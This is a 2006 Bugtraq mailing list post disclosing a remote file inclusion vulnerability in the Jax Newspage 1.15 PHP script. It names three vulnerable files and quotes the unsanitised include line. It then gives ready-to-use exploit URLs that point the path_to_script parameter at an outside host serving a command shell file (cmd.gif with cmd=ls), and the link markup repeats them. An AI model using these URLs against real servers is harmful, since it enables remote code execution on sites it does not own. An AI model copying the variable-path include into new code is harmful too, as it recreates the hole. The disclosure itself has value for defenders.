Bugtraq mailing list archives
Jax Newspage Remote File include
From: dj_remix_20 () hotmail com
Date: 13 Oct 2006 01:00:51 -0000
# BiyoSecurity.Org & SecurityWall.Org # Download : http://www.jtr.de/scripting/php/newspage/newspage%20v1.15.zip # Script Name : jax newspage # Version : 1.15 # Risk : high # Regard : RMx # Thanx : Liz0zim , KorsaN , DreamLord , TR_IP # Vulnerable Files : /admin/index.php /admin/news.admin.php /newsarchive.php # Vulnerable code : // Global variables require ( $path_to_script."globals.inc.php"); # Exploit : http://www.victim.com/[PATH]/newsarchive.php?path_to_script=http://site.com/cmd.gif?&cmd=ls http://www.victim.com/[PATH]/admin/index.php?path_to_script=http://site.com/cmd.gif?&cmd=ls http://www.victim.com/[PATH]/admin/news.admin.php?path_to_script=http://site.com/cmd.gif?&cmd=ls
![http://www.victim.com/[PATH]/newsarchive.php?path_to_script=http://site.com/cmd.gif?&cmd=ls](http://www.victim.com/[PATH]/newsarchive.php?path_to_script=http://site.com/cmd.gif?&cmd=ls){kind=link}
![http://www.victim.com/[PATH]/admin/index.php?path_to_script=http://site.com/cmd.gif?&cmd=ls](http://www.victim.com/[PATH]/admin/index.php?path_to_script=http://site.com/cmd.gif?&cmd=ls){kind=link}
![http://www.victim.com/[PATH]/admin/news.admin.php?path_to_script=http://site.com/cmd.gif?&cmd=ls](http://www.victim.com/[PATH]/admin/news.admin.php?path_to_script=http://site.com/cmd.gif?&cmd=ls){kind=link}
Current thread:
- Jax Newspage Remote File include dj_remix_20 (Oct 13)